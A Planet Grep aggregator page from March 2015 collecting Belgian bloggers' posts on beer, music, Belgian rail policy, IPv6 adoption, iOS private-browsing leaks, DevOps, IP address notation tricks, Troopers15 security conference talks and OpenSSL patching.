Subscriptions

Planet Grep is open to all people who either have the Belgian nationality or live in Belgium, and who actively work with or contribute to Open Source/Free software.

About Planet Grep...

Other planets can be found at the Planet Index.

A complete feed is available in a number of syndication formats: RSS 1.0, RSS 2.0, FOAF, and OPML.

The layout of this site was done by Gregory

March 26, 2015

Paul Cobbaut

black beer

There is always room for beer (linky).

Inglorious Quad: excellent!
Oesterstout: excellent!
Embrasse: very good.
Zumbi: excellent!
Barbe Noire: very good.

by Paul Cobbaut (noreply@blogger.com) at March 26, 2015 09:12 PM

Frank Goossens

Music from Our Tube: Bela Lugosi's Dead by lots of guys

Bela Lugosi's Dead is one of the most famous Bauhaus tracks and is (according to Wikipedia) often considered the first gothic rock record to have been released. But here you can see and hear a live version by TV on the Radio, Trent Reznor (Nine Inch Nails) and Bauhaus' Peter Murphy himself. Great stuff!

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at March 26, 2015 04:05 PM

March 25, 2015

Mattias Geniar

Belgium Leader in IPv6 Adoption

According to Akamai, at least.

European countries continued to be heavily dominant, taking 8 of the 10 spots. Newcomer Norway, with an 88% quarter-over-quarter jump in IPv6 traffic, pushed France out of the top 10.

Belgium again maintained its clear lead, with 32% of content requests made over IPv6 — more than double the percentage of second-place Germany.

Source: akamai’s [state of the internet] 2014

10 points to Belgium! More than 30% of all requests to Akamai are running over IPv6. That's impressive.

IPv6 Traffic Percentage, Top Countries/Regions

Worldwide, Telenet, Brutele and Belgacom are all present in the top 20.

[Chart: IPv6 traffic percentage per network provider]

IPv6 adoption is really speeding up in Belgium.

The post Belgium Leader in IPv6 Adoption appeared first on ma.ttias.be.

by Mattias Geniar at March 25, 2015 03:45 PM

March 24, 2015

Frank Goossens

iBert dreams: abolish the NMBS!

[Photo: a non-self-driving pesero]

One must dare to dream! Bert Van Wassenhove did just that, and in his "Laat ons een begin maken met de ontmanteling van de NMBS" ("Let's make a start on dismantling the NMBS") he accordingly proposes replacing trains, as befits an innovation-minded entrepreneur, with self-driving minibuses from Google, Apple, BMW or Tesla.

The core of his argument (my summary; do read the article yourself):

The NMBS costs too much and travellers are unhappy because of delays and other problems, so apparently the train cannot solve our mobility problems. The railways are, after all, a concept from the industrial revolution, and we long ago stopped all driving to one office building or factory next to a station in Brussels. Today other revolutions are at hand that can bring a solution: self-driving minibuses which, like the peseros in Mexico City, pick up travellers wherever demand is highest, driven entirely by the free market.

I wrote (part of) this blog post on the early double-decker train between Lokeren and Brussels. Occupancy: roughly 1,000 commuters. We are obviously not the only train running to and from Brussels; figures from 2013 show a daily average of 180,000 passengers boarding at the Brussels stations, and most of them (120,000?) no doubt have to board during peak hours and get off again on the way back. According to other figures, Brussels counts 330,000 commuters in total, who thus arrive by public transport or by car. You don't need sophisticated transport-economics analyses to conclude that a very large group of people still has to travel en masse "to one office building or factory next to a station in Brussels", and that without the train there would be nearly half again as many cars in and around Brussels. According to statbel figures, the train moreover carries more passengers year after year, rising from 144 to 224 million passengers between 1997 and 2010. Surely that counts as a (significant contribution to the) easing of the mobility problem? The downside: just like road traffic, the train is oversaturated during peak hours, and that does indeed cause quite a few problems.

With those figures for the required (peak) capacity in mind, deploying peseros, self-driving or not, looks like a utopia: dropping off and picking up 120,000 people in Brussels, at a capacity of roughly 10 passengers per minibus, quickly amounts to 12,000 extra minibuses in and around Brussels during the morning and evening peaks. If, as Bert proposes, we were to replace one train route with a fleet of peseros as a test and apply that to "my" line (Sint-Niklaas -> Brussel -> Kortrijk), then for the leg up to and including Brussels alone, 100 minibuses would have to run to get the 1,000 peak-hour commuters into the capital. I don't know about you, but I would rather not test the impact of that on mobility in practice.

But Bert's article is not without merit: while 100 peseros carrying those ex-train travellers from Sint-Niklaas, Lokeren and Dendermonde would only make the traffic-jam problem worse, those same 100 self-driving minibuses could also replace 1,000 passenger cars and thus noticeably reduce pressure on the roads. Now that would be a contribution to solving the mobility problem!

That leaves the problem of large groups of people who have to be in roughly the same place at roughly the same time, and that brings us to the dream Bert already sees as reality: what if we indeed no longer all had to come to one office building or factory next to a station in Brussels? Because (even) more working from home, decentralised or local, is indeed the only fundamental solution to the peak-hour capacity problems of both the roads and the railways. How do we convince large and smaller companies and their employees of that? Maybe that is precisely Bert's ultimate intention: make the problem worse by abolishing the railways, so as to force a change of mentality? A cunning dreamer, that iBert!

by frank at March 24, 2015 06:18 AM

March 23, 2015

Mattias Geniar

When Private Browsing Isn’t Private On iOS: HTML5 And AirPlay

Private Browsing: the illusion of privacy.

This applies to mobile devices that use iOS (iPhone, iPad). They have a peculiar way of handling a "private" session.

Shared HTML5 Storage

It's actually explained in the incognito FAQ: HTML5 storage on those iOS devices has a shared state. Everything stored in HTML5 storage in Incognito Mode can be accessed in normal mode.

... regular and incognito mode tabs share HTML5 local storage in iOS devices. HTML5 websites can access their data about your visit in this storage area.

Source: Browse in private

This mostly shows when websites use the HTML5 local storage for searchbox completion or store the session state of games. In most common use cases, you won't notice. Mainly because HTML5 Local Storage isn't that widely adopted yet.

AirPlay Cache

Apple devices have the ability to use AirPlay to stream audio and video to a remote receiver, like a stereo (Airport Express) or a TV (Apple TV).

When you start such a session in Incognito Mode and stream your audio or video, and later close that session, the AirPlay cache will still hold the filename/title of the media item you most recently played.

For instance, if you play Psy's Gangnam Style on an iOS device in Incognito mode, close the tab and continue browsing in Regular Mode, the AirPlay info screen will still show you the filename/title of the movie last played.

This meta info of the media played is only removed after you forcefully close the browser.

Closing the tab isn't enough. This meta info will also be broadcast to any remote device you have connected, be it an Apple TV, Airport Express or in-car entertainment that syncs with AirPlay.

It Could Be Worse

Sure, it's not as bad as storing Incognito URLs in a plain DB file like Safari does, but it just goes to show: Incognito Mode isn't really incognito. It's perfect for testing websites in a fresh environment though.

Regardless of server-side user matching, man-in-the-middle proxies and network sniffers, even local devices can't separate regular vs incognito mode properly. Don't use Incognito Mode for anything you don't want people to know. Expect, one day, to see your Incognito Browsing habits made public.

Make sure you don't have to be (too) ashamed.

The post When Private Browsing Isn’t Private On iOS: HTML5 And AirPlay appeared first on ma.ttias.be.

by Mattias Geniar at March 23, 2015 09:10 PM

March 22, 2015

Mattias Geniar

Life Without Ops

Have you ever done a Puppet run with the --noop option? It does what the name implies: nothing.

Use 'noop' mode where the daemon runs in a no-op or dry-run mode. This is useful for seeing what changes Puppet will make without actually executing the changes.
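
For reference (my own example, not from the post), such a dry run boils down to something like this; the exact flags and setup will vary:

$ puppet agent --test --noop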

This is exactly what happens if you have no Ops. Nothing.

Startup Mentality

Not everyone is the same. Neither is every startup. However, I see more and more startups misinterpreting what DevOps is all about. They are publicly looking to hire Developers with a bit of sysadmin knowledge, and expect that to be DevOps.

That's like asking a carpenter to also fix your leaky plumbing.

DevOps isn't about developers doing your system administration. Neither is it letting your sysadmins perform development-related tasks. You can have the DevOps spirit and still have those two perfectly defined job roles.

DevOps, however, preaches communication. Breaking silos. Having Dev and Ops work together. Learning from each other. Complementing each other. Not doing each other's work.

Why Ops Exist

It's so easy to implement some complex Puppet modules and have them working. But do you know what you're doing? What happens when your downloaded modules fail on you, and a few months in your ElasticSearch suddenly breaks? Or you've reached the limits of your MongoDB setup? Or you suddenly realise Redis is single-threaded?

This is what Ops are for. They've fought the battle. They know what the bottlenecks are, because they've experienced them. Server-side. They know what happens to the network, the disk I/O, the memory and the CPU cycles whenever you reindex your SOLR cores.

This isn't knowledge to take for granted. You can't expect a full-time developer, with basic knowledge of systems administration, to have the same level of experience. And maybe you don't expect it. Maybe it's OK in the first few months.

But here's my plea, and I'm hoping you'll understand: go take advice from experienced system administrators. Find someone with battle scars, who's walked the walk. If you can't find it in-house, consider outsourcing. Or plain one-off consultancy.

There's a reason Ops exist. It isn't to cost you money, it's to help you save money in the long run.

The post Life Without Ops appeared first on ma.ttias.be.

by Mattias Geniar at March 22, 2015 08:11 PM

Silly Little IP Tricks

I'll show you a few things you can do with IP addresses you may not know yet. They aren't new -- just part of the RFC -- but you don't encounter them that often.

Octal values

For instance, did you know that if you prefix an octet of an IP address with 0s, it gets treated as an octal value? Spot the conversion in the ping below.

$ ping 193.239.211.036
PING 193.239.211.036 (193.239.211.30): 56 data bytes
Request timeout for icmp_seq 0
...

You would've expected the ping request to go to the IP ending in .36, instead it went to .30. Why? Because 036 is actually the octal value for the decimal 30.
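
A quick way to convince yourself (my example, not from the original post): shell arithmetic applies the same leading-zero rule.

$ echo $(( 036 ))
30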

Straight Up Integers

IP addresses are formed out of binary sequences, we know this. The binary forms get translated to decimals, for readability.

$ ping 3253719844
PING 3253719844 (193.239.211.36): 56 data bytes
64 bytes from 193.239.211.36: icmp_seq=0 ttl=57 time=17.003 ms
...

Pinging to an integer, like 3253719844, actually works. In the background, it's converted to the real IP notation of 193.239.211.36.
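
As a small sketch of that conversion (my example, not from the original post), the integer form of a dotted quad can be computed with plain shell arithmetic:

$ IFS=. read -r a b c d <<< "193.239.211.36"
$ echo $(( (a << 24) | (b << 16) | (c << 8) | d ))
3253719844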

Let's Hex It

You probably saw this coming. If you can ping the integer notation of an IP, would the HEX value work?

$ ping 0xC1EFD324
PING 0xC1EFD324 (193.239.211.36): 56 data bytes
64 bytes from 193.239.211.36: icmp_seq=0 ttl=57 time=18.277 ms
...

Yup!
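
And the other building block (again my own illustration): printf turns each octet into hex, giving exactly the value pinged above.

$ printf '0x%02X%02X%02X%02X\n' 193 239 211 36
0xC1EFD324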

Skipping A Dot

A great addition, thanks to Petru's comment: you can also skip digit-groups in the IP address.

$ ping 4.8
PING 4.8 (4.0.0.8): 56 data bytes
64 bytes from 4.0.0.8: icmp_seq=0 ttl=48 time=156.139 ms
...

The last digit-group is treated as the remainder of the value, so ping 4.8 actually expands to ping 4.0.0.8, because the digit '8' is treated as a 24-bit integer covering the last three octets.

If you ever want to have fun with a junior colleague, think of these examples. The octal values especially are easy to miss if you place the leading zeros somewhere in the middle.

Oh and if you decide to test these examples, you'll be pinging one of our nameservers. No harm, feel free to.

The post Silly Little IP Tricks appeared first on ma.ttias.be.

by Mattias Geniar at March 22, 2015 07:45 PM

March 19, 2015

Xavier Mertens

Troopers15 Wrap-Up Day #2

This is my wrap-up of the second day of Troopers15. Before the review of the talks, a few words about the conference. The venue is really nice, as are the facilities: good WiFi coverage (IPv4/IPv6) and even a dedicated GSM network! "Troopers" SIM cards were available for free at the reception desk. Besides the classic activities, a charity auction was also organized to help organizations realize projects around the Internet, like installing a satellite link in a refugee camp.

The second keynote was given by Sergey Bratus, Research Assistant Professor at Dartmouth College. Sergey is an amazing speaker! His keynote title was "My favourite things".

Sergey on stage

Sergey explained via multiple examples how we are facing impossible problems that we cannot fight: the distinction between hard and (probably) impossible. Examples: flight is hard; perpetual motion is impossible. Computer programs rely on inputs. A classic path is:

input -> processing -> output.

And, nothing new, we cannot trust inputs. The idea presented by Sergey is to clearly split the analysis of inputs from the processing. To sanitise inputs we need to parse the data, but writing parsers is very difficult. As he said: "Parsers are like crypto, don't write them yourself". He demonstrated how some quick patches in popular applications (Apache, Nginx) are stupid checks that could be avoided by writing correct parsers of the data. Other examples were reviewed:

The Heartbleed bug

Sergey recommended a parser toolkit called Hammer. You must have a bright line between the input stream & validation on one side and the processing (malloc(), memcpy()) on the other. The final tip provided by Sergey was: simplify the inputs, use a grammar and keep it simple.

For the talks, my first choice was to go to the "defence" track where Friedwart Kuhn presented "How to Efficiently Protect Active Directory from Credential Theft & Large Scale Compromise". It was based on real-world expertise. Microsoft is present in almost every company network with its Active Directory architecture. The first question asked by Friedwart was: "Do you think that you/your AD is safe?"

Do you think you are protected?

For a while, Active Directory infrastructures have been targeted by multiple attacks: Pass-the-Hash, Golden Tickets, etc. I liked the comparison with Terminator 2, who can impersonate anybody and bypass security controls. Stolen credentials remain a major threat today. Explaining how the authentication processes work in the Windows operating systems would require much more than a 1-hour talk, but Friedwart made a good compilation of the most common terms and protocols (the LSASS process, NTLM, Kerberos, etc). Keep in mind that for most versions of the Microsoft OS, the data is still stored in memory, which makes it readable by many tools (like mimikatz). Friedwart also insisted on the fact that other operating systems are vulnerable too: Ubuntu stores the Kerberos tickets in temporary files, and the root account can access all of them. After this introduction (with a white hat), Friedwart switched to the black-hat side and explained how easy credential theft & reuse are. He explained the "pass-the-hash" attack and the "Golden Ticket" attack. He made a live demo and created a Golden Ticket valid for ten years(!).

Finally, Friedwart explained how to mitigate such attacks. He split the response in two slides. One for the management based on three major steps:

The good news: this does not require huge investments! The other slides explained mitigation techniques from a technical point of view. The idea is to design and implement in 3 tiers: DC / Servers / Workstations. You also need to separate duties and use an ESAE forest (a service offered by Microsoft). To mitigate attacks, there is not much left to do if you already implemented the above requirements. A last tip: reset the KRBTGT account on a regular basis and of course… monitor your logs!

My second choice was a talk about CVE-2011-2461 by Luca Carettoni and Mauro Gentile. Adobe Flex (Apache Flex since 2011) is an open source SDK to build SWF files. It provides a lot of tools and classes to develop interactive apps. Starting from Flex v3, apps support dynamic localization (multiple languages). This can be done at compilation time or dynamically using a component called a Resource Module, which allows changing text labels without recompiling the app. Resources can be pre-loaded by passing FlashVars in the HTML wrapper, and the Same Origin Policy (SOP) applies in Adobe plug-ins. What if a malicious web page can ask Flex apps to load arbitrary resource modules? This is CVE-2011-2461.

CVE-2011-2461

Some exploitation scenarios?

They performed a live demo of the vulnerability. To conclude:

The last question was: are there applications still vulnerable, four years later? Yes, of course! To identify such applications, the speakers developed a tool called ParrotNG. It can be used from the command line or, even more powerful, as a BurpSuite plug-in. Finally, keep in mind that all files must be patched and the player does not help. Suggestion to Adobe: implement checks in the player to block vulnerable applications.

After the lunch, Martijn Grooten, from Virus Bulletin, presented "The state of email in 2015". More precisely, the talk was about how to fight spam, which remains a major issue today. Everybody has been using email for years and it hasn't changed since the 90s. One fact: Alice can send mail to Bob without prior permission; this is what makes "unsolicited mail" (spam) possible. To eliminate spam, email would have to be redesigned!

Martijn on stage

Then came spam filters, content-based and otherwise, but still today it remains a cat & mouse game. Spammers realised they can pretend to be someone else and use bots. So, how to mitigate the spam problem?

What is SPF (Sender Policy Framework)? Think of it as asking, via DNS requests, whether an IP address may send email for a domain. DMARC builds on SPF/DKIM. The status today is that spam is fairly well mitigated. Note that the current anti-spam infrastructure remains vulnerable to big changes. Then IPv6 came and changed the landscape! Good news and bad news: email runs properly on IPv6 (layer 7) but… spam filters make heavy use of… IPv4… Why not keep them on IPv4? We don't need so many IPv6 mail servers… We can't stop IPv6 deployment… Solutions? Adapt blacklists to IPv6?
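
As a quick illustration (my example, not from the talk), an SPF policy is just a TXT record anyone can look up; the receiving mail server checks the connecting IP against it:

$ dig +short TXT example.org
# look for a record starting with "v=spf1 ..." that lists which hosts
# may send mail for the domain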

Then Martijn switched to the next big issue with email: privacy! In email there is a pre- and a post-Snowden era… Encryption is popular but… if mails are sent to the 1st SMTP hop using TLS, what about the other relays? PGP to the rescue! PGP is not easy, not scalable, and leaks a lot of metadata! A few words about DIME (Dark Internet Mail Environment): encrypted, with a very low amount of metadata. DMTP is an extension of SMTP. DIME has been written by people who understand email. It integrates smoothly into email and allows users to place trust in servers (webmail). Users don't need to understand crypto! Can we be optimistic? We have collectively shown that we're very good at fighting spam. DIME includes various levels of security and trust, and spam filters can be integrated into those.

The next talk was "Weapons of Mass Distraction – Sock Puppetry for Fun & Profit" by Marco Slaviero and Azhar Desai. I was curious about the title, which is why I decided to attend their presentation.

Sock Puppet

The Internet being a medium, it has already been cut off from time to time by governments (e.g. Egypt, Tunisia). But instead of stupidly cutting off the Internet, those same governments found that it can also be used to control their citizens. UGC ("User Generated Content") has become more and more important over the last years. Everybody can generate content on blogs and social networks. UGC is the new paradigm. How will government censorship handle UGC? Censorship 2.0 is profoundly important. With such an amount of data created online, how can we affect the way it receives attention from people? The research by Marco and Azhar is based on sock puppets. What is a sock puppet? Here is the Wikipedia definition: a sock puppet is an online identity used for purposes of deception. The questions posed by the speakers were:

The challenge is to measure the efficiency of your increase/decrease of attention. How do you divert the attention of your readers? They reviewed multiple ways to share information and applied different scenarios:

It was very interesting to see how differently people react to a message if it is posted alone or as a new message with several replies. Are there real sock puppets in the wild? Yes, this happens. How to attract them? Use hot or controversial topics. They analysed the relation between registration times and comment-posting times. The sock puppet army is really active on the following forums: CNN, AJ English and the Jerusalem Post. They used https://disqus.com/ to achieve this. What are the topics? But who's behind this army? They have no idea. The conclusion of this talk: all UGC sites have been trivial to manipulate!

Finally, the last talk was "Wallstreet of Windows Binaries" by Marion Marschalek and Moti Joseph. For a while now, bugs have had names, logos and websites. They are better documented than before because today it's cool to find a bug! Researchers need their 5 minutes of fame.

Marion on stage

Moti explained why the 0-day business is very close to trading:

Finding a 0-day is like holding a stock: you have to value it, you can sell it, you can trade it against another 0-day. How to value a 0-day? Like an IPO (Initial Public Offering): the value depends on the market. The market decides the value, not the developer! Insider trading? Prohibited… if you are working for the target and have access to sources/tools/docs. Buying and selling the same 0-day multiple times? Exclusive vs shared sale. Where do you trade a 0-day? On the white or the black market. White: ZDI, iDefense; black: more money! If you go to the black market, you need a broker who will take it, value it and search for customers (taking a percentage as commission). Windows vulnerabilities are often referred to by API/keyword, just as companies have ticker codes: e.g. GradientFill -> Fill.

Finding vulnerabilities by rating functions? Marion's tool is called "Wallstreet". Data analytics for cheap people: Marion showed a picture of sheep, one of them black. How do you separate the black sheep from the others?

  1. Problem: Find Frank the black sheep
  2. Attributes: Hair length, color
  3. Attributes evaluation: Sound won’t work
  4. Fine graining: 2 colors only
  5. Magic: SELECT * FROM … WHERE color=‘black’

The tool is based on:

The presentation ended with a demo of how to find which processes load a specific DLL, which could lead to a compromised system.

It’s already over for me. I drove immediately back to Belgium after the last talk. First amazing experience with TROOPERS! Thanks to the crew and particularly to Enno to welcome me.

by Xavier at March 19, 2015 10:34 PM

Mattias Geniar

OpenSSL CVE-2015-0291 and CVE-2015-0286

As announced, OpenSSL released patches for high severity vulnerabilities in the library.

For OpenSSL v1.0.2, this is the Denial of Service CVE.

Changes between 1.0.2 and 1.0.2a [19 Mar 2015]

*) ClientHello sigalgs DoS fix

If a client connects to an OpenSSL 1.0.2 server and renegotiates with an
invalid signature algorithms extension a NULL pointer dereference will
occur. This can be exploited in a DoS attack against the server.

This issue was reported to OpenSSL by David Ramos of Stanford
University.
(CVE-2015-0291)
[Stephen Henson and Matt Caswell]
OpenSSL 1.0.2 release notes

For OpenSSL v1.0.1 and v1.0.0 and v0.9.8, it's this one (also a Denial of Service).

Changes between 1.0.1l and 1.0.1m [19 Mar 2015]
Changes between 1.0.0q and 1.0.0r [19 Mar 2015]
Changes between 0.9.8ze and 0.9.8zf [19 Mar 2015]

*) Segmentation fault in ASN1_TYPE_cmp fix

The function ASN1_TYPE_cmp will crash with an invalid read if an attempt is
made to compare ASN.1 boolean types. Since ASN1_TYPE_cmp is used to check
certificate signature algorithm consistency this can be used to crash any
certificate verification operation and exploited in a DoS attack. Any
application which performs certificate verification is vulnerable including
OpenSSL clients and servers which enable client authentication.
(CVE-2015-0286)
[Stephen Henson]
OpenSSL 1.0.1 release notes -- OpenSSL 1.0.0 release notes -- OpenSSL 0.9.8

So it's upgrade time again, although the impacted systems could be a relatively small subset of your servers. However, if you're vulnerable, you may want to give this some priority.

The patch (the actual changed code) for the v1.0.2 vulnerability can be seen in the full commit: 34e3edbf3a10953cb407288101fd56a629af22f9.

The 0.9.8, 1.0.0 and 1.0.1 patches are much smaller, but have the same DoS effect. The full commit is here: 02758836731658381580e282ff403ba07d87b2f8.

The feared Denial of Service attack is unfortunately not limited to OpenSSL v1.0.2, as was anticipated: it affects v1.0.1, v1.0.0 and v0.9.8 as well.

Responsible Disclosure

Announcing these kinds of patches in advance, even without publishing the details of the patch or the CVE, will surely attract the attention of some bad guys as well. You can be sure they were awaiting the release and are now working on ways to make use of it.

Having said that, this kind of responsible disclosure is of the best kind: everyone knows in advance to reserve (human) resources in order to deal with the problem. OpenSSL did it 90% right. The remaining 10% would have been deserved if they had bothered to securely and discreetly inform LibreSSL of this issue, so they could prepare patches on their end as well.

Update: OpenSSL did inform the LibreSSL team of this vulnerability. A well-deserved 100% score for this responsibly disclosed vulnerability.

How to patch

As usual with OpenSSL patches, it's a 2-step fix. First, update the library on your OS.

$ yum update openssl

or

$ apt-get update
$ apt-get install openssl

Then, find all services that depend on the OpenSSL libraries, and restart them.

$ lsof | grep libssl | awk '{print $1}' | sort | uniq

Since the attack is a remote DoS, you should restart the public facing services as soon as possible. The internal services could be done at a later, more convenient, time.

Note: local system users may still be able to exploit those internal services, but it's another requirement in the whole exploit. Short-term, attackers will aim for the low hanging fruit: externally available services.
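
A rough sketch of how that lookup could be taken one step further on a systemd machine (my own example, not from the post; unit names will differ per server):

#!/bin/bash
# Map every process that still has libssl mapped to its systemd unit,
# so you know exactly which units to restart after the upgrade.
for pid in $(lsof 2>/dev/null | grep libssl | awk '{print $2}' | sort -un); do
    unit=$(ps -o unit= -p "$pid")
    printf "pid %-6s unit %s\n" "$pid" "${unit:-<none>}"
done | sort -u
# Review the list, then restart the public-facing units first, e.g.:
#   systemctl restart nginx.service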

Long-term Library Fixes

Every time something like this happens, either in OpenSSL or in glibc, I keep thinking about mapping these library dependencies in config management.

Maybe some day, I'll make a proof of concept for this. And some day, it'll save me a few hours of work, for every emergency patch that comes out. Some day.

The post OpenSSL CVE-2015-0291 and CVE-2015-0286 appeared first on ma.ttias.be.

by Mattias Geniar at March 19, 2015 02:24 PM

Joram Barrez

Interview about Activiti on Software Engineering Radio

My good friend Josh Long did an interview with me about Activiti and Business Process Management in general. I must admit, I was quite nervous before the recording, as I had never done a podcast before (note: the editors at SE Radio did a really great job). Here's the link: http://www.se-radio.net/2015/03/episode-223-joram-barrez-on-the-activiti-business-process-management-platform/ All feedback, as always, […]

by Joram Barrez at March 19, 2015 11:23 AM

March 18, 2015

Xavier Mertens

Troopers15 Wrap-Up Day #1

This is my first Troopers conference. I had already heard a lot of positive comments about this event but had never attended it. As I'll start a new job position soon, I had the opportunity to take some days off to travel to Heidelberg in Germany. The conference is split across two days and three tracks: "attack & research", "defence & management" and a special one dedicated to the security of SAP. Honestly, I don't work with SAP environments, so I decided not to follow that last track. The core organizer, Enno Rey, made a funny introduction speech and gave some numbers about the 2015 edition: 73 speakers, 160 people from the industry and 51 students (fresh blood). A key message for the conference is to not see speakers as super-stars. Don't be afraid to talk to them and share!

The first day started classically with a keynote presented by Haroon Meer, the founder of Thinkst, an applied research company with a deep focus on information security. The title was “The hard thing about the hard thing”.

Haroon on stage

It’s a fact: Doing security is pretty hard. Harmon cited a tweet: “If our industry is so broken, why don’t you leave and become a truck driver”. For him, (un)fortunately, we don’t have to convince people anymore that security is important. We have to focus on the bug problem and not on secure engineering. Another interesting quote was: “We don’t have a malware problem, we have an adversary problem”. Harmon reviewed three key components which directly affect security:

What about complexity? Networks of the future (today?) will become more and more complex and difficult to manage from a security point of view. As an example, Haroon cited the Linux kernel and the Chrome browser. The code is maintained by thousands of developers and consists of millions of lines of code. Think about this when you simply browse a website! It has become so complex that sometimes we lose control, and how do you protect something that you don't understand? In a composite system there is no critical gate, everything is a gate. We are bad at writing safe code. Microsoft has spent millions of dollars improving its code for years and today IE still suffers from many vulnerabilities (in the last Microsoft security bulletin of February 2015, many patches were released for Internet Explorer!). Shellshock is a very good example of a composite system. Another example: the Blackphone. Mark Dowd found a bug in its messaging application. Based on software quality checks, we better defend our network with PowerPoint than with a CheckPoint firewall (quote from FX). The market is also a source of problems. Incentives are part of the business failure: managers get promoted by shipping new software all the time. Count how many operating systems and versions you have used since you started working with computers. Even though some companies suffered giant breaches, this did not affect their value or their customers. In organisations, it's difficult to evaluate risks. To correctly evaluate them, you must know what can happen. Not easy! Remember: "You can't buy security!". Haroon gave many other examples which prove that we are at an inflection point with hard problems to be solved. A very nice keynote!

For the first talk, my choice was to follow Arrigo Triulzi, who presented "Pneumonia, Shardan, Antibiotics and Nasty MOVs: a dead hand's tale". A curious title! Arrigo was not able to travel from Switzerland to Heidelberg and gave his presentation via a Webex. From a technical point of view it was perfect, but I must confess that it's not the same as seeing the speaker in real life, even if Arrigo started with a joke: "I'm not a Snowden".

Webex

The talk started with a review of the technologies used during the Cold War with nuclear weapons. For a long time, attackers have used the "decapitation attack" to take out the C&C. To avoid this, defenders developed countermeasures so as not to lose control if the C&C is compromised. As an analogy with the infosec field, Arrigo explained that a SOC in a big company may become blind if the deployed sensors are killed. Back to the modern world, Arrigo explained how he successfully changed the microcode of processors. The biggest issue was persistence: if the CPU is power cycled, the changes are gone. To prevent this, he explained step by step how he added persistence using, for example, nicssh, another project used to run an SSH daemon in a NIC's firmware. While the idea of the talk was interesting, I had some difficulty following Arrigo's reasoning, maybe due to the Webex?

Then I switched to the second track with "Game over, does the CISO get an extra life?" presented by Richard Rushing, CISO of Motorola Mobility. Richard's idea was interesting: he compared the daily life of a CISO to a modern online game. He started with some facts called "security camping":

Richard on stage

A game's focus is on the player, but security's focus is on the attack surface. Think about the "shark in the water": never use terms like "theoretical". A good quote: "What is the difference between theoretical and practical? A few lines of code!". The next comparison was based on grinding or farming: what we do, what we hate in our job. Automation is good but we can't buy a solution; according to Richard, we must build it because all structures are different. Then came the lagging… so important in games but also in security. People also lag. Keep in mind that we can get pwned by a 10-year-old kid. We need good IR processes and vulnerability reports. Time is critical! The next analogy with games was the multi-player aspect. Security is a team sport. Everybody listens and comments, especially if you have processes like incident response. Bring in people that can make decisions. What about "power levelling"? Use known strategies to level faster, learn from friends, strangers and the old guys. What about newbies or noobs in security? Use them, even if it is as cannon fodder. Like games, security can have glitches: we need patches. And Richard gave more examples. IOCs can be compared to easter eggs in software (hidden messages). And what about the final boss in games? The problem with security is that the game is never over. A good talk with nice analogies to the gaming world.

After a lunch break, I moved back to the attack and defence side. Michael Ossmann presented “RF Retroreflectors, Emission Security and SDR”. This was the best talk of the day IMHO. The goal was to explain then demonstrate a retroreflector attack. The principle is based on an attacker -> target -> implant -> radar. It really acts like a classic radar, listening for returned data.

Michael on stage

In such an attack, the implant is very important. Note that attackers can also benefit from unintentional emissions, like those of screens. The first implant in history was "The Thing" (the Great Seal bug). It was very simple, required no battery, could run for years and was very difficult to detect. Between The Thing and the ANT catalog lie 53 years… What happened during this period? There is no real study, only rumours and speculation. To listen to the data returned by the implant, you need a "radar". Michael started playing with an old police radar but it was not very effective. Later he found a toy radar from Hot Wheels which was good enough.

Hot-Wheels Radar

He explained the lab that he deployed, based on two HackRF Ones (one for transmitting and one for receiving data). They act as a sound card using a microphone and speakers. Instead of classic antennas, Michael used coffee cans. The implant he developed is very simple and is called the "Congaflock". While this one is easy to hide in a cable or a keyboard, he quickly developed a new model with a PS/2 connector (more convenient). He gave a live demo and captured some key presses on the keyboard.

Gimme a "Q"

The next device presented was the "Salsaflock", which listens for VGA signals. Michael explained how screenshots can be captured using… The Gimp!

VGA data in Gimp

More details are available here.

Then Gabriel Barbosa and Rodrigo Branco talked about "Modern platform-supported rootkits". Why this talk? They work at Intel and had to follow mandatory trainings, but they had ideas for attacking systems in different ways.

Intel guys on stage

This talk was the result of their research. The biggest problem is assumption: people assume that a system behaves in a specific way. This is wrong! It is merely programmed to behave like this, and malware will change the way a system works. The current challenges for modern rootkits are: OS dependency, security mechanisms and the different models of computers. Gabriel and Rodrigo reviewed many examples of system abuse. It was really technical and hard for me to follow.

After the afternoon coffee break, "Defender Economics" was presented by Andreas Lindh. The goal of this talk was to understand attackers, their capabilities and their constraints. Yes, they also have constraints! Because it was a defensive talk, the goal was to use this knowledge to improve our defences. Two facts: an attacker only needs to find one way to hit his target, but a skilled and motivated attacker will always find a way.

Defenders economics

We must keep in mind that attackers are evolving and we can't protect against everything. A good point is that attackers don't have unlimited resources. Do you really need to protect against everything? Not sure. Attackers also have bosses and budgets. They also use basic maths: if the cost of an attack is less than the value of the information to be attacked, go for it! The attacker's economics are:

And for the defenders:

Attackers can be profiled. What are their motivations, resources and procedures? The motivation behind the attack and the level of motivation per target. What about resources? People and skills, tools and infrastructure, or the supply chain. Regarding the procedures: what are the attack vectors, post-exploitation activities and flexibility? Andreas explained this by comparing two scenarios:

The company X has multiple solutions to reduce the risks:

Keep in mind that we do not fight the armor but the man inside. Security is hard but:

Another good talk with good examples!

The day ended with some lightning talks. I really liked the one about virtual machine introspection & DRAKVUF. This is a dynamic malware analysis system which does not work like the other ones. Why focus on VMI? In-guest agents are easy to detect and vulnerable to rootkits, so we need to move the security outside the VM. A quick presentation of a nice tool to perform malware analysis. Have a look at it.

The first day was closed with the social event in a typical German restaurant. As usual, good food, beers and very interesting chats. For a first day, I'm really happy with the organization: nice venue, stable WiFi, a SIM card available with a dedicated mobile network (I did not trust it ;-)), good food and lots of Club-Mate. I'm looking forward to the second day!

Social Event

by Xavier at March 18, 2015 10:56 PM

Frank Goossens

Music from Our Tube: Andy Shauf – You're out wasting

Andy Shauf is a Canadian songwriter and below "You're out wasting" is a song off his third album "The Bearer of Bad News". Well worth a listen if you're in a somewhat quiet(er) mood.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at March 18, 2015 04:23 PM

March 17, 2015

Xavier Mertens

The lack of network documentation…

[This blogpost has also been published as a guest diary on isc.sans.org]

Document All Things

Writing documentation is a pain for most of us but… mandatory! Pentesters and auditors don't like writing their reports once the fun stuff has been completed. It is the same for developers: writing code and developing new products is fun, but good documentation is often missing. By documentation, I mean "network" documentation. Why?

When you buy software or hardware from a key player that will be connected to a corporate environment, the documentation usually contains a clear description of the network requirements. They could be:

